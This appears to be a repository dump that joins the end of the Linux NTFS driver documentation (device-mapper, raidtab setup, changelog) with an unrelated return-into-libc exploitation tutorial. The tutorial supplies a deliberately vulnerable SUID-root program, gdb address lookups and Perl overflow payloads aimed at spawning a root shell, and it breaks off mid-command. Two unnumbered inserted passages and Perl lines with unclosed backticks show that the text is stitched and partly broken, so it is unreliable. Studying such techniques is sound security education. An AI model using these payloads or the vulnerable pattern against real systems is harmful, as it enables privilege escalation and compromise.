using the main device (e.g. 302 | /dev/hda) and then using the offsets of the LDM partitions into this device as 303 | the "Start sector of device" when creating the table. Once again ldminfo would 304 | give you the correct information to do this. 305 | 306 | Assuming you know all your devices and their sizes things are easy. 
307 | 308 | For a linear raid the table would look like this (note all values are in 309 | 512-byte sectors): 310 | 311 | --- cut here --- 312 | # Offset into Size of this Raid type Device Start sector 313 | # volume device of device 314 | 0 1028161 linear /dev/hda1 0 315 | 1028161 3903762 linear /dev/hdb2 0 316 | 4931923 2103211 linear /dev/hdc1 0 317 | --- cut here --- 318 | 319 | For a striped volume, i.e. raid level 0, you will need to know the chunk size 320 | you used when creating the volume. Windows uses 64kiB as the default, so it 321 | will probably be this unless you changes the defaults when creating the array. 322 | 323 | For a raid level 0 the table would look like this (note all values are in 324 | 512-byte sectors): 325 | 326 | --- cut here --- 327 | # Offset Size Raid Number Chunk 1st Start 2nd Start 328 | # into of the type of size Device in Device in 329 | # volume volume stripes device device 330 | 0 2056320 striped 2 128 /dev/hda1 0 /dev/hdb1 0 331 | --- cut here --- 332 | 333 | If there are more than two devices, just add each of them to the end of the 334 | line. 335 | 336 | Finally, for a mirrored volume, i.e. raid level 1, the table would look like 337 | this (note all values are in 512-byte sectors): 338 | 339 | --- cut here --- 340 | # Ofs Size Raid Log Number Region Should Number Source Start Target Start 341 | # in of the type type of log size sync? of Device in Device in 342 | # vol volume params mirrors Device Device 343 | 0 2056320 mirror core 2 16 nosync 2 /dev/hda1 0 /dev/hdb1 0 344 | --- cut here --- 345 | 346 | If you are mirroring to multiple devices you can specify further targets at the 347 | end of the line. 348 | 349 | Note the "Should sync?" parameter "nosync" means that the two mirrors are 350 | already in sync which will be the case on a clean shutdown of Windows. If the 351 | mirrors are not clean, you can specify the "sync" option instead of "nosync" 352 | and the Device-Mapper driver will then copy the entirety of the "Source Device" 353 | to the "Target Device" or if you specified multipled target devices to all of 354 | them. 355 | 356 | Once you have your table, save it in a file somewhere (e.g. /etc/ntfsvolume1), 357 | and hand it over to dmsetup to work with, like so: 358 | 359 | $ dmsetup create myvolume1 /etc/ntfsvolume1 360 | 361 | You can obviously replace "myvolume1" with whatever name you like. 362 | 363 | If it all worked, you will now have the device /dev/device-mapper/myvolume1 364 | which you can then just use as an argument to the mount command as usual to 365 | mount the ntfs volume. For example: 366 | 367 | $ mount -t ntfs -o ro /dev/device-mapper/myvolume1 /mnt/myvol1 368 | 369 | (You need to create the directory /mnt/myvol1 first and of course you can use 370 | anything you like instead of /mnt/myvol1 as long as it is an existing 371 | directory.) 372 | 373 | It is advisable to do the mount read-only to see if the volume has been setup 374 | correctly to avoid the possibility of causing damage to the data on the ntfs 375 | volume. 376 | 377 | 378 | The Software RAID / MD driver 379 | ----------------------------- 380 | 381 | An alternative to using the Device-Mapper driver is to use the kernel's 382 | Software RAID / MD driver. For which you need to set up your /etc/raidtab 383 | appropriately (see man 5 raidtab). 384 | 385 | Linear volume sets, i.e. linear raid, as well as stripe sets, i.e. 
raid level 386 | 0, have been tested and work fine (though see section "Limitations when using 387 | the MD driver with NTFS volumes" especially if you want to use linear raid). 388 | Even though untested, there is no reason why mirrors, i.e. raid level 1, and 389 | stripes with parity, i.e. raid level 5, should not work, too. 390 | 391 | You have to use the "persistent-superblock 0" option for each raid-disk in the 392 | NTFS volume/stripe you are configuring in /etc/raidtab as the persistent 393 | superblock used by the MD driver would damage the NTFS volume. 394 | 395 | Windows by default uses a stripe chunk size of 64k, so you probably want the 396 | "chunk-size 64k" option for each raid-disk, too. 397 | 398 | For example, if you have a stripe set consisting of two partitions /dev/hda5 399 | and /dev/hdb1 your /etc/raidtab would look like this: 400 | 401 | raiddev /dev/md0 402 | raid-level 0 403 | nr-raid-disks 2 404 | nr-spare-disks 0 405 | persistent-superblock 0 406 | chunk-size 64k 407 | device /dev/hda5 408 | raid-disk 0 409 | device /dev/hdb1 410 | raid-disk 1 411 | 412 | For linear raid, just change the raid-level above to "raid-level linear", for 413 | mirrors, change it to "raid-level 1", and for stripe sets with parity, change 414 | it to "raid-level 5". 415 | 416 | Note for stripe sets with parity you will also need to tell the MD driver 417 | which parity algorithm to use by specifying the option "parity-algorithm 418 | which", where you need to replace "which" with the name of the algorithm to 419 | use (see man 5 raidtab for available algorithms) and you will have to try the 420 | different available algorithms until you find one that works. Make sure you 421 | are working read-only when playing with this as you may damage your data 422 | otherwise. If you find which algorithm works please let us know (email the 423 | linux-ntfs developers list linux-ntfs-dev[AT]lists.sourceforge[DOT]net or drop in on 424 | IRC in channel #ntfs on the irc.freenode.net network) so we can update this 425 | documentation. 426 | 427 | Once the raidtab is setup, run for example raid0run -a to start all devices or 428 | raid0run /dev/md0 to start a particular md device, in this case /dev/md0. 429 | 430 | Then just use the mount command as usual to mount the ntfs volume using for 431 | example: mount -t ntfs -o ro /dev/md0 /mnt/myntfsvolume 432 | 433 | It is advisable to do the mount read-only to see if the md volume has been 434 | setup correctly to avoid the possibility of causing damage to the data on the 435 | ntfs volume. 436 | 437 | 438 | Limitations when using the Software RAID / MD driver 439 | ----------------------------------------------------- 440 | 441 | Using the md driver will not work properly if any of your NTFS partitions have 442 | an odd number of sectors. This is especially important for linear raid as all 443 | data after the first partition with an odd number of sectors will be offset by 444 | one or more sectors so if you mount such a partition with write support you 445 | will cause massive damage to the data on the volume which will only become 446 | apparent when you try to use the volume again under Windows. 447 | 448 | So when using linear raid, make sure that all your partitions have an even 449 | number of sectors BEFORE attempting to use it. You have been warned! 450 | 451 | Even better is to simply use the Device-Mapper for linear raid and then you do 452 | not have this problem with odd numbers of sectors. 
453 | 454 | 455 | ChangeLog 456 | ========= 457 | 458 | Note, a technical ChangeLog aimed at kernel hackers is in fs/ntfs/ChangeLog. 459 | 460 | 2.1.29: 461 | - Fix a deadlock when mounting read-write. 462 | 2.1.28: 463 | - Fix a deadlock. 464 | 2.1.27: 465 | - Implement page migration support so the kernel can move memory used 466 | by NTFS files and directories around for management purposes. 467 | - Add support for writing to sparse files created with Windows XP SP2. 468 | - Many minor improvements and bug fixes. 469 | 2.1.26: 470 | - Implement support for sector sizes above 512 bytes (up to the maximum 471 | supported by NTFS which is 4096 bytes). 472 | - Enhance support for NTFS volumes which were supported by Windows but 473 | not by Linux due to invalid attribute list attribute flags. 474 | - A few minor updates and bug fixes. 475 | 2.1.25: 476 | - Write support is now extended with write(2) being able to both 477 | overwrite existing file data and to extend files. Also, if a write 478 | to a sparse region occurs, write(2) will fill in the hole. Note, 479 | mmap(2) based writes still do not support writing into holes or 480 | writing beyond the initialized size. 481 | - Write support has a new feature and that is that truncate(2) and 482 | open(2) with O_TRUNC are now implemented thus files can be both made 483 | smaller and larger. 484 | - Note: Both write(2) and truncate(2)/open(2) with O_TRUNC still have 485 | limitations in that they 486 | - only provide limited support for highly fragmented files. 487 | - only work on regular, i.e. uncompressed and unencrypted files. 488 | - never create sparse files although this will change once directory 489 | operations are implemented. 490 | - Lots of bug fixes and enhancements across the board. 491 | 2.1.24: 492 | - Support journals ($LogFile) which have been modified by chkdsk. This 493 | means users can boot into Windows after we marked the volume dirty. 494 | The Windows boot will run chkdsk and then reboot. The user can then 495 | immediately boot into Linux rather than having to do a full Windows 496 | boot first before rebooting into Linux and we will recognize such a 497 | journal and empty it as it is clean by definition. 498 | - Support journals ($LogFile) with only one restart page as well as 499 | journals with two different restart pages. We sanity check both and 500 | either use the only sane one or the more recent one of the two in the 501 | case that both are valid. 502 | - Lots of bug fixes and enhancements across the board. 503 | 2.1.23: 504 | - Stamp the user space journal, aka transaction log, aka $UsnJrnl, if 505 | it is present and active thus telling Windows and applications using 506 | the transaction log that changes can have happened on the volume 507 | which are not recorded in $UsnJrnl. 508 | - Detect the case when Windows has been hibernated (suspended to disk) 509 | and if this is the case do not allow (re)mounting read-write to 510 | prevent data corruption when you boot back into the suspended 511 | Windows session. 512 | - Implement extension of resident files using the normal file write 513 | code paths, i.e. most very small files can be extended to be a little 514 | bit bigger but not by much. 515 | - Add new mount option "disable_sparse". (See list of mount options 516 | above for details.) 517 | - Improve handling of ntfs volumes with errors and strange boot sectors 518 | in particular. 
519 | - Fix various bugs including a nasty deadlock that appeared in recent 520 | kernels (around 2.6.11-2.6.12 timeframe). 521 | 2.1.22: 522 | - Improve handling of ntfs volumes with errors. 523 | - Fix various bugs and race conditions. 524 | 2.1.21: 525 | - Fix several race conditions and various other bugs. 526 | - Many internal cleanups, code reorganization, optimizations, and mft 527 | and index record writing code rewritten to fit in with the changes. 528 | - Update Documentation/filesystems/ntfs.txt with instructions on how to 529 | use the Device-Mapper driver with NTFS ftdisk/LDM raid. 530 | 2.1.20: 531 | - Fix two stupid bugs introduced in 2.1.18 release. 532 | 2.1.19: 533 | - Minor bugfix in handling of the default upcase table. 534 | - Many internal cleanups and improvements. Many thanks to Linus 535 | Torvalds and Al Viro for the help and advice with the sparse 536 | annotations and cleanups. 537 | 2.1.18: 538 | - Fix scheduling latencies at mount time. (Ingo Molnar) 539 | - Fix endianness bug in a little traversed portion of the attribute 540 | lookup code. 541 | 2.1.17: 542 | - Fix bugs in mount time error code paths. 543 | 2.1.16: 544 | - Implement access time updates (including mtime and ctime). 545 | - Implement fsync(2), fdatasync(2), and msync(2) system calls. 546 | - Enable the readv(2) and writev(2) system calls. 547 | - Enable access via the asynchronous io (aio) API by adding support for 548 | the aio_read(3) and aio_write(3) functions. 549 | 2.1.15: 550 | - Invalidate quotas when (re)mounting read-write. 551 | NOTE: This now only leave user space journalling on the side. (See 552 | note for version 2.1.13, below.) 553 | 2.1.14: 554 | - Fix an NFSd caused deadlock reported by several users. 555 | 2.1.13: 556 | - Implement writing of inodes (access time updates are not implemented 557 | yet so mounting with -o noatime,nodiratime is enforced). 558 | - Enable writing out of resident files so you can now overwrite any 559 | uncompressed, unencrypted, nonsparse file as long as you do not 560 | change the file size. 561 | - Add housekeeping of ntfs system files so that ntfsfix no longer needs 562 | to be run after writing to an NTFS volume. 563 | NOTE: This still leaves quota tracking and user space journalling on 564 | the side but they should not cause data corruption. In the worst 565 | case the charged quotas will be out of date ($Quota) and some 566 | userspace applications might get confused due to the out of date 567 | userspace journal ($UsnJrnl). 568 | 2.1.12: 569 | - Fix the second fix to the decompression engine from the 2.1.9 release 570 | and some further internals cleanups. 571 | 2.1.11: 572 | - Driver internal cleanups. 573 | 2.1.10: 574 | - Force read-only (re)mounting of volumes with unsupported volume 575 | flags and various cleanups. 576 | 2.1.9: 577 | - Fix two bugs in handling of corner cases in the decompression engine. 578 | 2.1.8: 579 | - Read the $MFT mirror and compare it to the $MFT and if the two do not 580 | match, force a read-only mount and do not allow read-write remounts. 581 | - Read and parse the $LogFile journal and if it indicates that the 582 | volume was not shutdown cleanly, force a read-only mount and do not 583 | allow read-write remounts. If the $LogFile indicates a clean 584 | shutdown and a read-write (re)mount is requested, empty $LogFile to 585 | ensure that Windows cannot cause data corruption by replaying a stale 586 | journal after Linux has written to the volume. 
587 | - Improve time handling so that the NTFS time is fully preserved when 588 | converted to kernel time and only up to 99 nano-seconds are lost when 589 | kernel time is converted to NTFS time. 590 | 2.1.7: 591 | - Enable NFS exporting of mounted NTFS volumes. 592 | 2.1.6: 593 | - Fix minor bug in handling of compressed directories that fixes the 594 | erroneous "du" and "stat" output people reported. 595 | 2.1.5: 596 | - Minor bug fix in attribute list attribute handling that fixes the 597 | I/O errors on "ls" of certain fragmented files found by at least two 598 | people running Windows XP. 599 | 2.1.4: 600 | - Minor update allowing compilation with all gcc versions (well, the 601 | ones the kernel can be compiled with anyway). 602 | 2.1.3: 603 | - Major bug fixes for reading files and volumes in corner cases which 604 | were being hit by Windows 2k/XP users. 605 | 2.1.2: 606 | - Major bug fixes alleviating the hangs in statfs experienced by some 607 | users. 608 | 2.1.1: 609 | - Update handling of compressed files so people no longer get the 610 | frequently reported warning messages about initialized_size != 611 | data_size. 612 | 2.1.0: 613 | - Add configuration option for developmental write support. 614 | - Initial implementation of file overwriting. (Writes to resident files 615 | are not written out to disk yet, so avoid writing to files smaller 616 | than about 1kiB.) 617 | - Intercept/abort changes in file size as they are not implemented yet. 618 | 2.0.25: 619 | - Minor bugfixes in error code paths and small cleanups. 620 | 2.0.24: 621 | - Small internal cleanups. 622 | - Support for sendfile system call. (Christoph Hellwig) 623 | 2.0.23: 624 | - Massive internal locking changes to mft record locking. Fixes 625 | various race conditions and deadlocks. 626 | - Fix ntfs over loopback for compressed files by adding an 627 | optimization barrier. (gcc was screwing up otherwise ?) 628 | Thanks go to Christoph Hellwig for pointing these two out: 629 | - Remove now unused function fs/ntfs/malloc.h::vmalloc_nofs(). 630 | - Fix ntfs_free() for ia64 and parisc. 631 | 2.0.22: 632 | - Small internal cleanups. 633 | 2.0.21: 634 | These only affect 32-bit architectures: 635 | - Check for, and refuse to mount too large volumes (maximum is 2TiB). 636 | - Check for, and refuse to open too large files and directories 637 | (maximum is 16TiB). 638 | 2.0.20: 639 | - Support non-resident directory index bitmaps. This means we now cope 640 | with huge directories without problems. 641 | - Fix a page leak that manifested itself in some cases when reading 642 | directory contents. 643 | - Internal cleanups. 644 | 2.0.19: 645 | - Fix race condition and improvements in block i/o interface. 646 | - Optimization when reading compressed files. 647 | 2.0.18: 648 | - Fix race condition in reading of compressed files. 649 | 2.0.17: 650 | - Cleanups and optimizations. 651 | 2.0.16: 652 | - Fix stupid bug introduced in 2.0.15 in new attribute inode API. 653 | - Big internal cleanup replacing the mftbmp access hacks by using the 654 | new attribute inode API instead. 655 | 2.0.15: 656 | - Bug fix in parsing of remount options. 657 | - Internal changes implementing attribute (fake) inodes allowing all 658 | attribute i/o to go via the page cache and to use all the normal 659 | vfs/mm functionality. 660 | 2.0.14: 661 | - Internal changes improving run list merging code and minor locking 662 | change to not rely on BKL in ntfs_statfs(). 
663 | 2.0.13: 664 | - Internal changes towards using iget5_locked() in preparation for 665 | fake inodes and small cleanups to ntfs_volume structure. 666 | 2.0.12: 667 | - Internal cleanups in address space operations made possible by the 668 | changes introduced in the previous release. 669 | 2.0.11: 670 | - Internal updates and cleanups introducing the first step towards 671 | fake inode based attribute i/o. 672 | 2.0.10: 673 | - Microsoft says that the maximum number of inodes is 2^32 - 1. Update 674 | the driver accordingly to only use 32-bits to store inode numbers on 675 | 32-bit architectures. This improves the speed of the driver a little. 676 | 2.0.9: 677 | - Change decompression engine to use a single buffer. This should not 678 | affect performance except perhaps on the most heavy i/o on SMP 679 | systems when accessing multiple compressed files from multiple 680 | devices simultaneously. 681 | - Minor updates and cleanups. 682 | 2.0.8: 683 | - Remove now obsolete show_inodes and posix mount option(s). 684 | - Restore show_sys_files mount option. 685 | - Add new mount option case_sensitive, to determine if the driver 686 | treats file names as case sensitive or not. 687 | - Mostly drop support for short file names (for backwards compatibility 688 | we only support accessing files via their short file name if one 689 | exists). 690 | - Fix dcache aliasing issues wrt short/long file names. 691 | - Cleanups and minor fixes. 692 | 2.0.7: 693 | - Just cleanups. 694 | 2.0.6: 695 | - Major bugfix to make compatible with other kernel changes. This fixes 696 | the hangs/oopses on umount. 697 | - Locking cleanup in directory operations (remove BKL usage). 698 | 2.0.5: 699 | - Major buffer overflow bug fix. 700 | - Minor cleanups and updates for kernel 2.5.12. 701 | 2.0.4: 702 | - Cleanups and updates for kernel 2.5.11. 703 | 2.0.3: 704 | - Small bug fixes, cleanups, and performance improvements. 705 | 2.0.2: 706 | - Use default fmask of 0177 so that files are no executable by default. 707 | If you want owner executable files, just use fmask=0077. 708 | - Update for kernel 2.5.9 but preserve backwards compatibility with 709 | kernel 2.5.7. 710 | - Minor bug fixes, cleanups, and updates. 711 | 2.0.1: 712 | - Minor updates, primarily set the executable bit by default on files 713 | so they can be executed. 714 | 2.0.0: 715 | - Started ChangeLog. 716 | 717 | 718 | -------------------------------------------------------------------------------- /ret2libc.txt: -------------------------------------------------------------------------------- 1 | 2 | Exploitation - Returning into libc 3 |
                     __           __           __                     
  4 |   .-----.--.--.----.|  |.--.--.--|  |.-----.--|  |  .-----.----.-----.
  5 |   |  -__|_   _|  __||  ||  |  |  _  ||  -__|  _  |__|  _  |   _|  _  |
  6 |   |_____|__.__|____||__||_____|_____||_____|_____|__|_____|__| |___  |
  7 |    by shaun2k2 - member of excluded-team                       |_____|
  8 | 
  9 | 
 10 |                      ######################################
 11 | 		     # Exploitation - Returning into libc #
 12 | 		     ######################################
 13 | 
 14 | 				
 15 | 
 16 | 
 17 | ################
 18 | # Introduction #
 19 | ################
 20 | 
 21 | Generic vulnerabilities such as the infamous "buffer overflow vulnerability" 
 22 | crop up regularly in many immensely popular software packages thought by most 
 23 | to be secure, and programmers continue to make the same mistakes as a result 
 24 | of lazy or sloppy coding practices.  As programmers wise up to the common 
 25 | techniques employed by hackers when exploiting buffer overflow 
 26 | vulnerabilities, the likelihood of being able to execute arbitrary 
 27 | shellcode on the program stack decreases.  One example of why is that some 
 28 | Operating Systems are beginning to use non-executable stacks by default, 
 29 | which makes executing shellcode on the stack when exploiting a vulnerable 
 30 | application a significantly more challenging task.  Another possibility is 
 31 | that many IDSs automatically detect simple shellcodes, making injecting 
 32 | shellcode more of a task.
 33 | As with most scenarios, with a problem comes a solution.  With a little 
 34 | knowledge of the libc functions and their operation, one can take an alternate 
 35 | approach to executing arbitrary code as a result of exploitation of a buffer 
 36 | overflow vulnerability or another bug: returning to libc.
 37 | 
 38 | 
 39 | The intention of this article is not to teach you the ins and outs of buffer 
 40 | overflows, but to explain in a little detail another technique used to execute 
 41 | arbitrary code as opposed to the classic 'NOP sled + shellcode + repeated 
 42 | retaddr' method.  I assume readers are familiar with buffer overflow 
 43 | vulnerabilities and the basics of how to exploit them.  Also a little bit of the 
 44 | theory of memory organisation is desirable, such as how the little-endian byte 
 45 | ordering system works.  To those who are not familiar with buffer overflow bugs, 
 46 | I suggest you read "Smashing the Stack for Fun and Profit".
 47 | 
 48 | <http://www.phrack.org/phrack/49/P49-14>
 49 | 
 50 | 
 51 | #######################
 52 | # Returning into libc #
 53 | #######################
 54 | 
 55 | As the name suggests, the entire concept of the technique is that instead of 
 56 | overwriting the EIP register with the predicted or approximate address of your 
 57 | NOP sled in memory or your shellcode, you overwrite EIP with the address of a 
 58 | function contained within the libc library, with any function arguments 
 59 | following.  An example of such would be to exploit a buffer overflow bug to
 60 | overwrite EIP with the address of system() or execl() included in the libc 
 61 | library to run an interactive shell (/bin/sh for example).  This idea is quite 
 62 | reasonable, and since it does not involve estimating return addresses and 
 63 | building large exploit buffers, this is quite an appealing technique, but it 
 64 | does have its downsides, which I shall explain later.
 65 | 
 66 | Let me demonstrate an example of the technique.  Let's say we have the following 
 67 | small example program, vulnprog:
 68 | 
 69 | 
 70 | --START
 71 | #include <stdio.h>
 72 | #include <stdlib.h>
 73 | #include <string.h>
 74 | 
 75 | int main(int argc, char *argv[]) {
 76 |     if(argc < 2) {
 77 |         printf("Usage: %s <string>\n", argv[0]);
 78 |         exit(-1);
 79 |     }
 80 | 
 81 |     char buf[5];
 82 | 
 83 |     strcpy(buf, argv[1]);    /* no bounds check - this is the overflow */
 84 |     return(0);
 85 | }
 86 | 
 87 | 
 88 | gcc vulnprog.c -o vulnprog
 89 | chown root vulnprog
 90 | chmod +s vulnprog
 91 | 
 92 | --END
 93 | 
 94 | 
 95 | Anyone with a tiny bit of knowledge of buffer overflows can see that the 
 96 | preceding program is ridiculously insecure, and allows anybody who exceeds the 
 97 | bounds of `buf' to overwrite data on the stack.  It would usually be quite easy 
 98 | to write an exploit for the above example program, but let's assume that our 
 99 | friendly administrator has just read a computer security book and has enabled a 
100 | non-executable stack as a security measure.  This requires us to think a little 
101 | out of the box in order to be able to execute arbitrary code, but we already 
102 | have our solution: return into a libc function.
103 | 
104 | How, you may ask, do we actually get the information we need and prepare an 
105 | 'exploit buffer' in order to execute a libc function as a result of a buffer 
106 | overflow?  Well, all we need is the address of the desired libc function, and 
107 | the address of any function arguments.  So let's say for example we wanted to 
108 | exploit the above program (it is SUID root) to execute a shell (we want /bin/sh) 
109 | using system() - all we'd need is the address of system() and then the address 
110 | holding the string "/bin/sh" right?  Correct.  "But how do we begin to get this 
111 | info?".  That is what we're about to find out.
112 | 
113 | 
114 | --START
115 | [shaunige@localhost shaunige]$ echo "int main() { system(); }" > test.c
116 | [shaunige@localhost shaunige]$ cat test.c
117 | int main() { system(); }
118 | [shaunige@localhost shaunige]$ gcc test.c -o test
119 | [shaunige@localhost shaunige]$ gdb -q test
120 | (gdb) break main
121 | Breakpoint 1 at 0x8048342
122 | (gdb) run
123 | Starting program: /home/shaunige/test
124 | 
125 | Breakpoint 1, 0x08048342 in main ()
126 | (gdb) p system
127 | $1 = {<text variable, no debug info>} 0x4005f310 <system>
128 | (gdb) quit
129 | The program is running.  Exit anyway? (y or n) y
130 | [shaunige@localhost shaunige]$
131 | --END
132 | 
133 | 
134 | First, I created a tiny dummy program which calls the libc function 'system()' 
135 | without any arguments, and compiled it.  Next, I loaded the dummy program into 
136 | gdb, set a breakpoint on main(), ran it, and printed the address of system() 
137 | with 'p system'.  That address stays the same for any program using this libc, 
138 | as long as no address randomisation is in use and libc is not recompiled.  So, 
139 | now we have the address of system(), which puts us half way there.  However, we 
140 | still need to know how we can store the string "/bin/sh" in memory and 
141 | ultimately reference it whenever needed.  Let's think about this for a moment.  
142 | Maybe we could use an environmental variable to hold the string?  Yes, in fact, 
143 | an environmental variable would be ideal for this task, so let's create and use 
144 | an environment variable called $HACK to store our string ("/bin/sh").  But how 
145 | are we going to know the memory address of our environment variable and 
146 | ultimately our string?  We can write a simple utility program to grab the memory 
147 | address of the environmental variable.  Consider the following code:
148 | 
149 | 
150 | --START
151 | #include <stdio.h>
152 | #include <stdlib.h>
153 | 
154 | int main(int argc, char *argv[]) {
155 | 
156 |     if(argc < 2) {
157 |         printf("Usage: %s <environ_var>\n", argv[0]);
158 |         exit(-1);
159 |     }
160 | 
161 |     char *addr_ptr;
162 | 
163 |     addr_ptr = getenv(argv[1]);   /* pointer into this process's environment */
164 | 
165 |     if(addr_ptr == NULL) {
166 |         printf("Environmental variable %s does not exist!\n", argv[1]);
167 |         exit(-1);
168 |     }
169 | 
170 |     printf("%s is stored at address %p\n", argv[1], addr_ptr);
171 |     return(0);
172 | }
173 | --END
174 | 
175 | 
176 | This program will give us the address of a given environment variable; let's 
177 | test it out:
178 | 
179 | 
180 | --START
181 | [shaunige@localhost shaunige]$ gcc getenv.c -o getenv
182 | [shaunige@localhost shaunige]$ ./getenv TEST
183 | Environmental variable TEST does not exist!
184 | [shaunige@localhost shaunige]$ ./getenv HOME
185 | HOME is stored at address 0xbffffee2
186 | [shaunige@localhost shaunige]$
187 | --END
188 | 
189 | 
190 | Great, it seems to work.  Now, let's get down to actually creating our variable 
191 | with the desired string "/bin/sh" and get the address of it.
192 | 
193 | First I create the environmental variable, and then I run our above program to 
194 | get the memory location of a desired environment variable:
195 | 
196 | 
197 | --START
198 | [shaunige@localhost shaunige]$ export HACK="/bin/sh"
199 | [shaunige@localhost shaunige]$ echo $HACK
200 | /bin/sh
201 | [shaunige@localhost shaunige]$ ./getenv HACK
202 | HACK is stored at address 0xbffff9d8
203 | [shaunige@localhost shaunige]$
204 | --END
205 | 
206 | 
207 | This is good, we now have all of the information we need to exploit the 
208 | vulnerable program: the address of 'system()' (0x4005f310) and the address of 
209 | the environmental variable $HACK holding our string "/bin/sh" (0xbffff9d8).  So, 
210 | what do we do with this stuff?  Well, like in all instances of exploiting a 
211 | buffer overflow hole, we craft an exploit buffer, but ours is somewhat different 
212 | to one you may be used to seeing, with repeated NOPs (known as a 'NOP sled'), 
213 | shellcode and repeated return addresses.  Our exploit buffer needs to look 
214 | something like this:
215 | 
216 | 
217 | --START
218 | 
219 | 
220 | -----------------------------------------------------------------------------  
221 | |     system() addr     |     return address     |     system() argument    |
222 | -----------------------------------------------------------------------------
223 | 
224 | --END
225 | 
226 | 
227 | "But wait, I thought you said we don't need a return address?".  We do need to 
228 | supply one: when system() is entered this way, it expects a return address to 
229 | jump back to once it has finished its job.  But we don't care if the program 
230 | segmentation faults after the shell exits, so the address need not be valid; we'll just 
231 | specify 4 bytes of garbage data, "HACK" for example.  So, with this in mind, a 
232 | representation of our whole buffer needs to look like this:
233 | 
234 | 
235 | --START
236 | 
237 | ----------------------------------------------------------------------
238 | |  DATA-TO-OVERFLOW-BUFFER   |   0x4005f310  |  HACK  |  0xbffff9d8  |
239 | ----------------------------------------------------------------------
240 | 
241 | --END
242 | 
243 | 
244 | The data represented by 'DATA-TO-OVERFLOW-BUFFER' is just garbage data used to 
245 | overflow beyond the bounds ("boundaries") of the `buf' variable far enough to 
246 | position the address of the libc 'system()' function (0x4005f310) into the EIP 
247 | register.
248 | 
249 | It looks now like we have all of the information and theory we need: build a 
250 | buffer containing the address of a libc function, followed by a return address 
251 | to jump to after executing the function, followed by any function
252 | arguments for the libc function.  The buffer will need garbage data at the 
253 | beginning so as to overflow far enough into memory to overwrite the EIP register 
254 | with the address of system() so that it jumps to it instead of the next 
255 | instruction in the program (the same technique used when using shellcode: inject 
256 | an arbitrary memory address into EIP).  Now that we have all of the necessary 
257 | theory of this technique and the required information for actually implementing 
258 | it (i.e. the address of a libc function and the address of our "/bin/sh" string), 
259 | let's exploit this bitch!
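
Before we do, here's an optional little C sketch (not part of the original 
walkthrough) which double-checks both values at once: it prints the address of 
system() straight off a function pointer, and the address of the string held 
in $HACK via getenv().  On a box with no library or stack randomisation the 
output should line up with the figures gathered above, though the environment 
address can shift by a few bytes from program to program, since its exact 
position near the top of the stack depends on the program name and arguments.

--START
#include <stdio.h>
#include <stdlib.h>

int main(void) {

    /* address of the libc function, read from a function pointer */
    printf("system() is at %p\n", (void *)system);

    /* address of the value of the $HACK environment variable */
    char *hack = getenv("HACK");
    if(hack == NULL) {
        printf("HACK is not set - run: export HACK=\"/bin/sh\"\n");
        return 1;
    }
    printf("HACK (\"%s\") is at %p\n", hack, hack);
    return 0;
}
--END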
260 | 
261 | 
262 | ################
263 | # EXPLOITATION #
264 | ################
265 | 
266 | We have the necessary stuff, so let's get on with the ultimate goal: to get a 
267 | root shell by executing 'system("/bin/sh")' rather than shellcode!  Let's assume 
268 | that we are exploiting a Linux system with a non-executable stack, so we have no 
269 | other option than to 'return into libc'.
270 | 
271 | Remembering back to the diagram representation of our exploit buffer, we should 
272 | recall that garbage data must come first, enough of it to reach the saved EIP, 
273 | followed by the memory location of 'system()', then followed by a return 
274 | address which need not be valid, followed by the memory address of "/bin/sh".  
275 | Let's see if we can exploit vulnprog.c this way.  If you think back, we have 
276 | already set and exported the environmental variable $HACK, but let's do it again 
277 | and grab the memory address, just for clarity's sake.
278 | 
279 | 
280 | --START
281 | [shaunige@localhost shaunige]$ export HACK="/bin/sh"
282 | [shaunige@localhost shaunige]$ echo $HACK
283 | /bin/sh
284 | [shaunige@localhost shaunige]$ ./getenv HACK
285 | HACK is stored at address 0xbffff9d8
286 | [shaunige@localhost shaunige]$
287 | --END
288 | 
289 | 
290 | Good, we now have the address of our string.  You should also remember that we 
291 | created a dummy program which called 'system()' from which we got our address of 
292 | system() with the help of GDB.  The address was 0x4005f310.  We've got the 
293 | stuff, so let's write that exploit!  We'll do it with Perl from the console, 
294 | because it gives us more flexibility and more room for testing than writing a 
295 | larger program in C does.
296 | 
297 | First, we must reverse the bytes of the addresses of 'system()' and of the 
298 | environment variable holding "/bin/sh", because we are working on a system that 
299 | uses little-endian byte ordering.  This gives us:
300 | 
301 | 
302 | 'system()' address:
303 | ####################
304 | 
305 | \x10\xf3\x05\x40
306 | 
307 | 
308 | $HACK's address:
309 | #################
310 | 
311 | \xd8\xf9\xff\xbf
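
If you want to double-check the byte order on your own machine, a quick sketch
like the following (my addition, not from the article) prints the in-memory
byte layout of the system() address; on a little-endian x86 box it prints
\x10\xf3\x05\x40.

--START
/* endian.c - NOT from the original article; prints the bytes of the
 * system() address as they sit in memory, least significant byte first
 * on a little-endian machine. */

#include <stdio.h>

int main(void) {
    unsigned int addr = 0x4005f310;          /* libc system() address found earlier */
    unsigned char *p = (unsigned char *) &addr;
    int i;

    for (i = 0; i < 4; i++)
        printf("\\x%02x", p[i]);             /* -> \x10\xf3\x05\x40 on x86 */
    printf("\n");
    return 0;
}
--END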
312 | 
313 | 
314 | And we know that the return address expected by any libc function just needs 
315 | to be some 4-byte value.  We'll just use "HACK".  Therefore, our exploit 
316 | buffer looks like this so far:
317 | 
318 | 
319 | \x10\xf3\x05\x40HACK\xd8\xf9\xff\xbf
320 | 
321 | But something is missing.  In its current state, if fed to vulnprog, the 
322 | address of 'system()' would NOT end up in EIP like we want, because we 
323 | wouldn't have overflowed the 'buf' variable far enough to reach the saved 
324 | return address.  So, as shown in the diagram of our exploit buffer above, we're 
325 | going to need to prepend garbage data to the beginning of our exploit buffer 
326 | to overwrite far enough into the stack region to reach EIP so that we can 
327 | overwrite that return address.  How can we know how much garbage data we need, 
328 | given that it has to be spot on?  The only reasonable way is trial and error.  
329 | From playing with vulnprog a little, I found that we will probably need about 
330 | 6-9 words of garbage data.
331 | 
332 | 
333 | --START
334 | 
335 | [shaunige@localhost shaun]$ ./vulnprog `perl -e 'print "BLEH"x6 . 
336 | "\x10\xf3\x05\x40HACK\xd8\xf9\xff\xbf"'`
337 | Segmentation fault
338 | 
339 | [shaunige@localhost shaun]$ ./vulnprog `perl -e 'print "BLEH"x9 . 
340 | "\x10\xf3\x05\x40HACK\xd8\xf9\xff\xbf"'
341 | Segmentation fault
342 | 
343 | [shaunige@localhost shaun]$ ./vulnprog `perl -e 'print "BLEH"x8 . 
344 | "\x10\xf3\x05\x40HACK\xd8\xf9\xff\xbf"'
345 | Segmentation fault
346 | 
347 | [shaunige@localhost shaun]$ ./vulnprog `perl -e 'print "BLEH"x7 .
